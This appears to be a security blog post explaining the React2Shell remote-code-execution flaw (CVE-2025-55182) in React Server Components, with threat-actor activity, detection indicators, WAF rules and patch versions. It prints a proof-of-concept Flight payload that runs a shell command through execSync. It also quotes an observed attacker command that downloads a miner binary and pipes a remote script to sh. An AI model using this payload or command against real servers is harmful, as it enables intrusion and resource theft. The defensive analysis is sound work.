Listen to this Post

Introduction:
CVE-2025-55182, dubbed “React2Shell,” is a catastrophic vulnerability in React Server Components with a maximum CVSS score of 10.0. It allows unauthenticated attackers to execute arbitrary code on servers with a single HTTP request, exploiting a fundamental flaw in the “Flight” serialization protocol. Within hours of public disclosure, this flaw ignited a global cyber wildfire, drawing exploitation from opportunistic cryptominers to sophisticated state-nexus espionage groups targeting millions of exposed applications.
Learning Objectives:
- Understand the four-stage exploitation chain of the React2Shell vulnerability and the insecure deserialization at its core.
- Identify the key threat actors, from China-nexus groups to cryptomining botnets, and their post-compromise malware payloads.
- Implement immediate detection rules, WAF mitigations, and the mandatory patching required to secure vulnerable React and Next.js workloads.
You Should Know:
- The Anatomy of a 10.0-Rated Exploit: Four Stages to Shell
The React2Shell vulnerability is not a simple buffer overflow but a logical flaw in JavaScript object property validation within the `reviveModel` function. The exploit chain is a masterclass in abusing JavaScript’s prototype inheritance and React’s internal mechanics.
Step-by-step guide explaining what this does and how to use it.
Stage 1: Create a Self-Reference Loop. The attacker crafts a React Flight payload where two chunks reference each other using the `$@` prefix (which returns the raw chunk object). This loop, such as chunk `0` referencing `$1:__proto__` and chunk `1` containing "$@0", provides a controlled path to walk up JavaScript’s prototype chain and access powerful built-in constructors.
Stage 2: Hijack the `then` Property. JavaScript’s `await` keyword automatically invokes the `.then()` method of an object. The attacker sets the malicious chunk’s `then` property to point to an internal React function like Chunk.prototype.then. This tricks the server into executing the attacker’s next stage as if it were resolving a Promise.
Stage 3: Inject Malicious Initialization Data. The attacker sets the chunk’s `status` field to "resolved_model". React, trusting this status, proceeds to initialize the chunk by parsing its `value` field, which the attacker has populated with their next malicious reference.
Stage 4: Trigger Arbitrary Code Execution via Blob Handler. The final payload in the `value` field references the `$B` (Blob) prefix. This triggers React’s blob handler, which calls a `.get()` method on an object the attacker now controls. By pointing `_formData.get` to the `Function` constructor, the attacker transforms the string in `_prefix` into executable shell commands on the server.
A simplified proof-of-concept payload structure looks like this:
{
"0": {
"status": "resolved_model",
"_response": {
"_prefix": "require('child_process').execSync('id')//",
"_formData": { "get": "$1:then:constructor" }
},
"then": "$1:then",
"value": "{"then":"$B"}"
},
"1": "$@0"
}
2. In-The-Wild Attacks: From Espionage to Cryptojacking
The ease of exploitation led to immediate, widespread abuse. Threat intelligence from Google, AWS, and Darktrace reveals a clear segmentation of attacker motives and capabilities.
Step-by-step guide explaining what this does and how to use it.
China-Nexus Espionage Campaigns: Groups tracked as Earth Lamia, Jackpot Panda, and various UNC clusters were among the first to weaponize the exploit. Their objectives are intelligence gathering, leading to the deployment of sophisticated backdoors and tunnelers.
MINOCAT (UNC6600): A tunneler using an embedded FRP (Fast Reverse Proxy) client. Attackers establish persistence via cron jobs and systemd services.
HISONIC (UNC6603): A Go-based backdoor that retrieves encrypted configuration from legitimate services like Cloudflare Pages, blending malicious traffic with normal web activity.
COMPOOD & SNOWLIGHT: Other backdoors and downloaders deployed via simple `wget` or `curl` commands to fetch payloads from attacker-controlled infrastructure.
Opportunistic Cryptomining Botnets: Financially motivated actors launched automated scans for port 3000 (common for Next.js dev servers) to deploy coin miners. The “Nuts & Bolts” campaign, for example, uses a script that kills competing miners, downloads an XMRig binary, and deploys a persistent killer script to monopolize the victim’s resources.
Observed Payload Delivery Command:
(cd /dev;(wget -O x86 hxxp://malicious[.]site/nuts/x86||curl -s -o x86 hxxp://malicious[.]site/nuts/x86 );chmod 777 x86;./x86 reactOnMynuts; (wget -q hxxp://malicious[.]site/nuts/bolts -O-||curl -s hxxp://malicious[.]site/nuts/bolts)|sh)&
3. Detecting Exploitation Attempts and Compromise
Defenders must look for specific network and host-based indicators. A dual-validation approach—checking for exploit attempts and confirming a vulnerable version—is recommended to reduce false positives.
Step-by-step guide explaining what this does and how to use it.
Network-Based Detection (Log Review):
HTTP Requests: Look for POST requests containing `next-action` or `rsc-action-id` headers.
Request Body Signatures: Search for patterns like "$@", "status":"resolved_model", and serialized JSON with complex nested references.
Suspicious Outbound Calls: Monitor for applications making unexpected outbound HTTP requests using `curl` or `wget` to unknown IP addresses, especially on non-standard ports (3000-3011).
Host-Based Detection (Server Investigation):
Process & Command History: Check for unexpected execution of reconnaissance commands (whoami, id, uname -a) or attempts to read `/etc/passwd` from the Node.js process.
File System Artifacts: Look for new, suspicious files in `/tmp/` or `/dev/` (e.g., pwned.txt, x86, fghgf). Check for unauthorized cron jobs or systemd services (e.g., system-update-service).
Resource Abuse: Monitor for unexpected high CPU usage from unknown processes, a hallmark of cryptocurrency miners like XMRig.
- Immediate Mitigation: Patching and Virtual Patching with WAF Rules
Patching is the only complete remedy, but Web Application Firewall (WAF) rules provide a critical “virtual patch” to block exploitation attempts while patching is underway.
Step-by-step guide explaining what this does and how to use it.
Mandatory Patching:
React: Upgrade `react-server-dom-` packages to version 19.0.1, 19.1.2, or 19.2.1.
Next.js: Upgrade to the latest patched versions (e.g., 15.5.7, 16.0.7). Redeployment of the application is required after updating dependencies.
Cloud WAF Rule Deployment (Google Cloud Armor Example): A preconfigured rule (cve-canary) is available. Deploy it in “preview” (logging) mode first to validate, then enforce it.
Using gcloud CLI to add the rule:
gcloud compute security-policies rules create PRIORITY_NUMBER \
--security-policy=SECURITY_POLICY_NAME \
--expression="evaluatePreconfiguredExpr('cve-canary')" \
--action=deny-403
AWS WAF Protection: The latest version of the managed rule group `AWSManagedRulesKnownBadInputsRuleSet` (version 1.24+) includes protections for this CVE. Ensure this rule group is enabled and updated.
- The Misinformation Problem: Fake PoCs and Researcher Targeting
The vulnerability’s disclosure was accompanied by a flood of low-quality or outright fake proof-of-concept (PoC) code, some of which was AI-generated. This created significant confusion and wasted defender resources. More dangerously, some fake PoC repositories contained actual malware designed to infect the systems of security researchers who downloaded them. This underscores the critical need to only trust and validate exploit details from reputable, authoritative security sources like vendor advisories and established security firms.
What Undercode Say:
- The Window for Defense is Measured in Hours, Not Days. The coordinated disclosure to major cloud providers allowed them to deploy WAF rules at scale just before public release. This incident proves the value of such cooperation and sets a new benchmark for response timelines, as nation-state actors began testing exploits within this same narrow window.
- This Vulnerability is a Ecosystem-Wake Up Call. React2Shell exploits a logical flaw in a default, mainstream web technology—not a misconfigured edge case. With Wiz Research reporting that 39% of cloud environments contain vulnerable instances, it exposes a massive collective blind spot in modern application security, where the security of foundational front-end frameworks has profound back-end consequences.
Prediction:
The exploitation of CVE-2025-55182 will evolve from broad, noisy scanning to more targeted, stealthy intrusions. Espionage groups that gained initial footholds will now move laterally, using compromised cloud workloads to harvest credentials from environment variables and instance metadata services. We will likely see the vulnerability integrated into the permanent arsenal of botnet herders and ransomware affiliate groups, leading to recurring waves of cryptomining and extortion campaigns against persistently unpatched systems. Furthermore, the discovery of three additional React vulnerabilities (CVE-2025-55183, CVE-2025-55184, CVE-2025-67779) in quick succession suggests that the React Server Components architecture will undergo intense security scrutiny, potentially leading to more critical disclosures in the near future.
▶️ Related Video (88% Match):
https://www.youtube.com/watch?v=4g54JTyXcmo
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Deepak Saini – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


